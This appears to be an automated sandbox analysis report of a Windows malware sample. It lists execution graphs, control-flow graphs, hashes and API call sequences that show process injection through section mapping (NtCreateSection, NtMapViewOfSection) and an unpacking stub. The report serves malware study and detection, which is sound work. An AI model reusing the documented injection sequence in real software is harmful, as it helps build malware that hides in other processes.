                                                                                execution_graph 3658 402e20 3659 402dd5 3658->3659 3661 402e24 3658->3661 3660 4019e3 15 API calls 3662 403029 3660->3662 3661->3660 3661->3662 3663 401620 3664 401626 3663->3664 3665 4016c6 NtDuplicateObject 3664->3665 3674 4017e2 3664->3674 3666 4016e3 NtCreateSection 3665->3666 3665->3674 3667 401763 NtCreateSection 3666->3667 3668 401709 NtMapViewOfSection 3666->3668 3669 40178f 3667->3669 3667->3674 3668->3667 3670 40172c NtMapViewOfSection 3668->3670 3671 401799 NtMapViewOfSection 3669->3671 3669->3674 3670->3667 3672 40174a 3670->3672 3673 4017c0 NtMapViewOfSection 3671->3673 3671->3674 3672->3667 3673->3674 3699 2e10001 3700 2e10005 3699->3700 3705 2e1092b GetPEB 3700->3705 3702 2e10030 3707 2e1003c 3702->3707 3706 2e10972 3705->3706 3706->3702 3708 2e10049 3707->3708 3709 2e10e0f 2 API calls 3708->3709 3710 2e10223 3709->3710 3711 2e10d90 GetPEB 3710->3711 3712 2e10238 VirtualAlloc 3711->3712 3713 2e10265 3712->3713 3714 2e102ce VirtualProtect 3713->3714 3716 2e1030b 3714->3716 3715 2e10439 VirtualFree 3719 2e104be LoadLibraryA 3715->3719 3716->3715 3718 2e108c7 3719->3718 3552 3011365 3553 3011374 3552->3553 3556 3011b05 3553->3556 3557 3011b20 3556->3557 3558 3011b29 CreateToolhelp32Snapshot 3557->3558 3559 3011b45 Module32First 3557->3559 3558->3557 3558->3559 3560 3011b54 3559->3560 3561 301137d 3559->3561 3563 30117c4 3560->3563 3564 30117ef 3563->3564 3565 3011800 VirtualAlloc 3564->3565 3566 3011838 3564->3566 3565->3566 3566->3566 3720 2e10005 3721 2e1092b GetPEB 3720->3721 3722 2e10030 3721->3722 3723 2e1003c 7 API calls 3722->3723 3724 2e10038 3723->3724 3640 401a09 3641 401a0e 3640->3641 3642 401a2b Sleep 3641->3642 3643 401524 7 API calls 3642->3643 3644 401a46 3643->3644 3645 401615 7 API calls 3644->3645 3646 401a53 3644->3646 3645->3646 3729 4019ee 3730 4019f8 3729->3730 3731 401a53 3730->3731 3732 401a2b Sleep 3730->3732 3733 401524 7 API calls 3732->3733 3734 401a46 3733->3734 3734->3731 3735 401615 7 API calls 3734->3735 3735->3731 3725 402f74 3727 402f7e 3725->3727 3726 4019e3 15 API calls 3728 403029 3726->3728 3727->3726 3727->3728 3654 3011354 3655 3011365 3654->3655 3656 3011b05 3 API calls 3655->3656 3657 301137d 3656->3657 3567 402f9c 3568 402f8f 3567->3568 3570 403029 3568->3570 3571 4019e3 3568->3571 3572 4019f3 3571->3572 3573 401a2b Sleep 3572->3573 3575 401a53 3572->3575 3578 401524 3573->3578 3575->3570 3576 401a46 3576->3575 3590 401615 3576->3590 3579 401533 3578->3579 3579->3576 3580 4016c6 NtDuplicateObject 3579->3580 3589 4017e2 3579->3589 3581 4016e3 NtCreateSection 3580->3581 3580->3589 3582 401763 NtCreateSection 3581->3582 3583 401709 NtMapViewOfSection 3581->3583 3584 40178f 3582->3584 3582->3589 3583->3582 3585 40172c NtMapViewOfSection 3583->3585 3586 401799 NtMapViewOfSection 3584->3586 3584->3589 3585->3582 3587 40174a 3585->3587 3588 4017c0 NtMapViewOfSection 3586->3588 3586->3589 3587->3582 3588->3589 3589->3576 3591 401626 3590->3591 3592 4016c6 NtDuplicateObject 3591->3592 3601 4017e2 3591->3601 3593 4016e3 NtCreateSection 3592->3593 3592->3601 3594 401763 NtCreateSection 3593->3594 3595 401709 NtMapViewOfSection 3593->3595 3596 40178f 3594->3596 3594->3601 3595->3594 3597 40172c NtMapViewOfSection 3595->3597 3598 401799 NtMapViewOfSection 3596->3598 3596->3601 3597->3594 3599 40174a 3597->3599 3600 4017c0 NtMapViewOfSection 3598->3600 3598->3601 3599->3594 3600->3601 3601->3575 3602 2e1003c 3603 2e10049 3602->3603 3615 2e10e0f SetErrorMode SetErrorMode 3603->3615 3608 2e10265 3609 2e102ce VirtualProtect 3608->3609 3611 2e1030b 3609->3611 3610 2e10439 VirtualFree 3614 2e104be LoadLibraryA 3610->3614 3611->3610 3613 2e108c7 3614->3613 3616 2e10223 3615->3616 3617 2e10d90 3616->3617 3618 2e10dad 3617->3618 3619 2e10dbb GetPEB 3618->3619 3620 2e10238 VirtualAlloc 3618->3620 3619->3620 3620->3608

                                                                                Executed Functions

                                                                                Function 00401524 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 85 401524-401556 92 401563-40156c call 4012a9 85->92 97 401593-40159b 92->97 98 40156e-401580 92->98 99 40159d-4015a0 97->99 100 401582-401589 98->100 101 4015fd-401612 98->101 104 4015a2-4015a4 99->104 105 4015e9-4015ef 99->105 102 401560 100->102 103 40158b-40158d 100->103 106 401639-40165a 101->106 102->92 107 401590-401592 103->107 108 4015a6-4015c7 104->108 109 4015f7 104->109 105->109 115 40165d-401670 call 4012a9 106->115 116 40164e-401656 106->116 107->97 111 401643 108->111 112 4015c9 108->112 109->101 111->106 112->107 114 4015cb 112->114 114->99 117 4015cd 114->117 120 401672 115->120 121 401675-40167a 115->121 116->115 117->105 120->121 123 401680-401691 121->123 124 401991-401999 121->124 127 401697-4016c0 123->127 128 40198f-4019e0 call 4012a9 123->128 124->121 127->128 136 4016c6-4016dd NtDuplicateObject 127->136 136->128 137 4016e3-401707 NtCreateSection 136->137 140 401763-401789 NtCreateSection 137->140 141 401709-40172a NtMapViewOfSection 137->141 140->128 142 40178f-401793 140->142 141->140 144 40172c-401748 NtMapViewOfSection 141->144 142->128 145 401799-4017ba NtMapViewOfSection 142->145 144->140 146 40174a-401760 144->146 145->128 148 4017c0-4017dc NtMapViewOfSection 145->148 146->140 148->128 150 4017e2 call 4017e7 148->150
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                                                • Instruction ID: 3423bc01ac4f23736aca193bd8ce0b677c435782841011dc968e413a06447a3e
                                                                                • Opcode Fuzzy Hash: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                                                • Instruction Fuzzy Hash: 4781CFB1500208BFDB209FA1DC89FABBFB8FF85710F10002AF952BA1E0D6759945CB65
                                                                                Function 00401615 Relevance: 10.7, APIs: 7, Instructions: 204nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 155 401615-40165a 163 40165d-401670 call 4012a9 155->163 164 40164e-401656 155->164 167 401672 163->167 168 401675-40167a 163->168 164->163 167->168 170 401680-401691 168->170 171 401991-401999 168->171 174 401697-4016c0 170->174 175 40198f-4019e0 call 4012a9 170->175 171->168 174->175 183 4016c6-4016dd NtDuplicateObject 174->183 183->175 184 4016e3-401707 NtCreateSection 183->184 187 401763-401789 NtCreateSection 184->187 188 401709-40172a NtMapViewOfSection 184->188 187->175 189 40178f-401793 187->189 188->187 191 40172c-401748 NtMapViewOfSection 188->191 189->175 192 401799-4017ba NtMapViewOfSection 189->192 191->187 193 40174a-401760 191->193 192->175 195 4017c0-4017dc NtMapViewOfSection 192->195 193->187 195->175 197 4017e2 call 4017e7 195->197
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                                                • Instruction ID: a4a30113af8e0dba67415144994249baddb0a1b9eea12a3ecfbdd2b7a77b6b5b
                                                                                • Opcode Fuzzy Hash: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                                                • Instruction Fuzzy Hash: B16160B0A04204FBEB209F95CC59FAFBBB9FF85700F14012AF912BA1E4D6759941CB65
                                                                                Function 00401635 Relevance: 10.7, APIs: 7, Instructions: 178nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 202 401635-40165a 206 40165d-401670 call 4012a9 202->206 207 40164e-401656 202->207 210 401672 206->210 211 401675-40167a 206->211 207->206 210->211 213 401680-401691 211->213 214 401991-401999 211->214 217 401697-4016c0 213->217 218 40198f-4019e0 call 4012a9 213->218 214->211 217->218 226 4016c6-4016dd NtDuplicateObject 217->226 226->218 227 4016e3-401707 NtCreateSection 226->227 230 401763-401789 NtCreateSection 227->230 231 401709-40172a NtMapViewOfSection 227->231 230->218 232 40178f-401793 230->232 231->230 234 40172c-401748 NtMapViewOfSection 231->234 232->218 235 401799-4017ba NtMapViewOfSection 232->235 234->230 236 40174a-401760 234->236 235->218 238 4017c0-4017dc NtMapViewOfSection 235->238 236->230 238->218 240 4017e2 call 4017e7 238->240
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: Section$CreateDuplicateObjectView
                                                                                • String ID:
                                                                                • API String ID: 1652636561-0
                                                                                • Opcode ID: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                                                • Instruction ID: 3fb00a2a449b0bf69def1bd66bbf1e23b36e7d6b3741b7ef4c3438294d77159f
                                                                                • Opcode Fuzzy Hash: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                                                • Instruction Fuzzy Hash: 48514BB1900245BFEB208F91CC49FABBBB9FF85B10F140169F911BA2E5D6759941CB24
                                                                                Function 0040162D Relevance: 10.7, APIs: 7, Instructions: 174nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 245 40162d-40165a 251 40165d-401670 call 4012a9 245->251 252 40164e-401656 245->252 255 401672 251->255 256 401675-40167a 251->256 252->251 255->256 258 401680-401691 256->258 259 401991-401999 256->259 262 401697-4016c0 258->262 263 40198f-4019e0 call 4012a9 258->263 259->256 262->263 271 4016c6-4016dd NtDuplicateObject 262->271 271->263 272 4016e3-401707 NtCreateSection 271->272 275 401763-401789 NtCreateSection 272->275 276 401709-40172a NtMapViewOfSection 272->276 275->263 277 40178f-401793 275->277 276->275 279 40172c-401748 NtMapViewOfSection 276->279 277->263 280 401799-4017ba NtMapViewOfSection 277->280 279->275 281 40174a-401760 279->281 280->263 283 4017c0-4017dc NtMapViewOfSection 280->283 281->275 283->263 285 4017e2 call 4017e7 283->285
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                                                • Instruction ID: aa686160c5e479dc60cd3c6abf7d34016e244b0820b9c6a6449991f1b23776f6
                                                                                • Opcode Fuzzy Hash: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                                                • Instruction Fuzzy Hash: F1513BB1900209BFEB208F91CC48FAFBBB8FF85B10F140129F911BA2E5D6759945CB24
                                                                                Function 00401620 Relevance: 10.7, APIs: 7, Instructions: 173nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 290 401620-40165a 297 40165d-401670 call 4012a9 290->297 298 40164e-401656 290->298 301 401672 297->301 302 401675-40167a 297->302 298->297 301->302 304 401680-401691 302->304 305 401991-401999 302->305 308 401697-4016c0 304->308 309 40198f-4019e0 call 4012a9 304->309 305->302 308->309 317 4016c6-4016dd NtDuplicateObject 308->317 317->309 318 4016e3-401707 NtCreateSection 317->318 321 401763-401789 NtCreateSection 318->321 322 401709-40172a NtMapViewOfSection 318->322 321->309 323 40178f-401793 321->323 322->321 325 40172c-401748 NtMapViewOfSection 322->325 323->309 326 401799-4017ba NtMapViewOfSection 323->326 325->321 327 40174a-401760 325->327 326->309 329 4017c0-4017dc NtMapViewOfSection 326->329 327->321 329->309 331 4017e2 call 4017e7 329->331
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                                                • Instruction ID: 248f23169df6d57de1173162bb8fcbefd5e68f0f1e7bb912041edb2cf68793e3
                                                                                • Opcode Fuzzy Hash: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                                                • Instruction Fuzzy Hash: 11512AB0900245BFEB208F91CC48FAFBBB8FF85B00F14016AF911BA2E5D6759941CB24
                                                                                Function 00401658 Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 336 401658-401670 call 4012a9 340 401672 336->340 341 401675-40167a 336->341 340->341 343 401680-401691 341->343 344 401991-401999 341->344 347 401697-4016c0 343->347 348 40198f-4019e0 call 4012a9 343->348 344->341 347->348 356 4016c6-4016dd NtDuplicateObject 347->356 356->348 357 4016e3-401707 NtCreateSection 356->357 360 401763-401789 NtCreateSection 357->360 361 401709-40172a NtMapViewOfSection 357->361 360->348 362 40178f-401793 360->362 361->360 364 40172c-401748 NtMapViewOfSection 361->364 362->348 365 401799-4017ba NtMapViewOfSection 362->365 364->360 366 40174a-401760 364->366 365->348 368 4017c0-4017dc NtMapViewOfSection 365->368 366->360 368->348 370 4017e2 call 4017e7 368->370
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                                                • Instruction ID: 4b61e56e2161a851a120027933825f601e9725a76b72e0f731e8dd48e05b5e19
                                                                                • Opcode Fuzzy Hash: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                                                • Instruction Fuzzy Hash: FC51F7B5900249BFEF209F91CC88FAFBBB9FF85B10F100159F911AA2A5D6749944CB24
                                                                                Function 02E1003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 2e1003c-2e10047 1 2e10049 0->1 2 2e1004c-2e10263 call 2e10a3f call 2e10e0f call 2e10d90 VirtualAlloc 0->2 1->2 17 2e10265-2e10289 call 2e10a69 2->17 18 2e1028b-2e10292 2->18 23 2e102ce-2e103c2 VirtualProtect call 2e10cce call 2e10ce7 17->23 20 2e102a1-2e102b0 18->20 22 2e102b2-2e102cc 20->22 20->23 22->20 29 2e103d1-2e103e0 23->29 30 2e103e2-2e10437 call 2e10ce7 29->30 31 2e10439-2e104b8 VirtualFree 29->31 30->29 33 2e105f4-2e105fe 31->33 34 2e104be-2e104cd 31->34 37 2e10604-2e1060d 33->37 38 2e1077f-2e10789 33->38 36 2e104d3-2e104dd 34->36 36->33 41 2e104e3-2e10505 36->41 37->38 39 2e10613-2e10637 37->39 42 2e107a6-2e107b0 38->42 43 2e1078b-2e107a3 38->43 44 2e1063e-2e10648 39->44 54 2e10517-2e10520 41->54 55 2e10507-2e10515 41->55 45 2e107b6-2e107cb 42->45 46 2e1086e-2e108be LoadLibraryA 42->46 43->42 44->38 48 2e1064e-2e1065a 44->48 47 2e107d2-2e107d5 45->47 53 2e108c7-2e108f9 46->53 50 2e10824-2e10833 47->50 51 2e107d7-2e107e0 47->51 48->38 52 2e10660-2e1066a 48->52 60 2e10839-2e1083c 50->60 57 2e107e2 51->57 58 2e107e4-2e10822 51->58 59 2e1067a-2e10689 52->59 61 2e10902-2e1091d 53->61 62 2e108fb-2e10901 53->62 56 2e10526-2e10547 54->56 55->56 63 2e1054d-2e10550 56->63 57->50 58->47 64 2e10750-2e1077a 59->64 65 2e1068f-2e106b2 59->65 60->46 66 2e1083e-2e10847 60->66 62->61 68 2e105e0-2e105ef 63->68 69 2e10556-2e1056b 63->69 64->44 70 2e106b4-2e106ed 65->70 71 2e106ef-2e106fc 65->71 72 2e10849 66->72 73 2e1084b-2e1086c 66->73 68->36 74 2e1056d 69->74 75 2e1056f-2e1057a 69->75 70->71 76 2e1074b 71->76 77 2e106fe-2e10748 71->77 72->46 73->60 74->68 78 2e1059b-2e105bb 75->78 79 2e1057c-2e10599 75->79 76->59 77->76 84 2e105bd-2e105db 78->84 79->84 84->63
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02E1024D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1997135222.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2e10000_sdveeeu.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: cess$kernel32.dll
                                                                                • API String ID: 4275171209-1230238691
                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction ID: 05d9d281a1c433bce65ea9a5464aedae69b2998bd44d145af81311050d83877e
                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction Fuzzy Hash: 7E526974A01229DFDB64CF58C984BACBBB1BF09314F1480E9E94DAB351DB30AA85CF14
                                                                                Function 03011B05 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 375 3011b05-3011b1e 376 3011b20-3011b22 375->376 377 3011b24 376->377 378 3011b29-3011b35 CreateToolhelp32Snapshot 376->378 377->378 379 3011b45-3011b52 Module32First 378->379 380 3011b37-3011b3d 378->380 381 3011b54-3011b55 call 30117c4 379->381 382 3011b5b-3011b63 379->382 380->379 387 3011b3f-3011b43 380->387 385 3011b5a 381->385 385->382 387->376 387->379
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 03011B2D
                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 03011B4D
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1997359017.000000000300B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0300B000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_300b000_sdveeeu.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 3833638111-0
                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction ID: ebb6c675da44e3c295fd9e33d64eafa9ff2b8da62e2cf24506975e8f85dd7550
                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction Fuzzy Hash: 91F0F6361017116FD7687BF89CCCBAFB3ECAF49620F140568E743954C0EB70E8054A60
                                                                                Function 02E10E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 388 2e10e0f-2e10e24 SetErrorMode * 2 389 2e10e26 388->389 390 2e10e2b-2e10e2c 388->390 389->390
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,02E10223,?,?), ref: 02E10E19
                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,02E10223,?,?), ref: 02E10E1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1997135222.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_2e10000_sdveeeu.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction ID: 8542446d127bdfb01e3c0bf921da1d9e01cee5e862faad54c88cd0ae9bd8b7d4
                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction Fuzzy Hash: A4D0123114512877DB002A95DC09BCD7B1CDF05B66F008021FB0DD9080C770954046E5
                                                                                Function 00401A01 Relevance: 1.3, APIs: 1, Instructions: 90sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 391 401a01-401a02 392 401a04-401a05 391->392 393 401a60 392->393 394 401a06-401a48 call 4012a9 Sleep call 401524 392->394 395 401a62 393->395 396 4019f8-401a0b 393->396 405 401a57-401a6f 394->405 425 401a4a-401a52 call 401615 394->425 398 401a53 395->398 399 401a64 395->399 396->392 398->405 402 401a66-401a6b 399->402 403 401ace-401b1c call 4012a9 399->403 409 401a72-401aa7 call 4012a9 402->409 432 401b21 403->432 405->409 418 401a65-401a6b 405->418 418->409 425->398 432->432
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                                                • Instruction ID: 81c5b6d8da752c85ef5c48e217346158da0f95f2e0f30d6723e854e1366495a5
                                                                                • Opcode Fuzzy Hash: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                                                • Instruction Fuzzy Hash: AE21383234E201EBDB009B90AD419BA3315AB85714F34467BF5137A1F2C63E99436F6B
                                                                                Function 004019E3 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 434 4019e3-4019fc 436 4019f3 434->436 437 4019ff-401a0b 434->437 438 4019f8 436->438 441 401a60 437->441 442 401a06-401a48 call 4012a9 Sleep call 401524 437->442 438->437 441->438 443 401a62 441->443 451 401a57-401a6f 442->451 470 401a4a-401a52 call 401615 442->470 445 401a53 443->445 446 401a64 443->446 445->451 448 401a66-401a6b 446->448 449 401ace-401b1c call 4012a9 446->449 454 401a72-401aa7 call 4012a9 448->454 477 401b21 449->477 451->454 463 401a65-401a6b 451->463 463->454 470->445 477->477
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
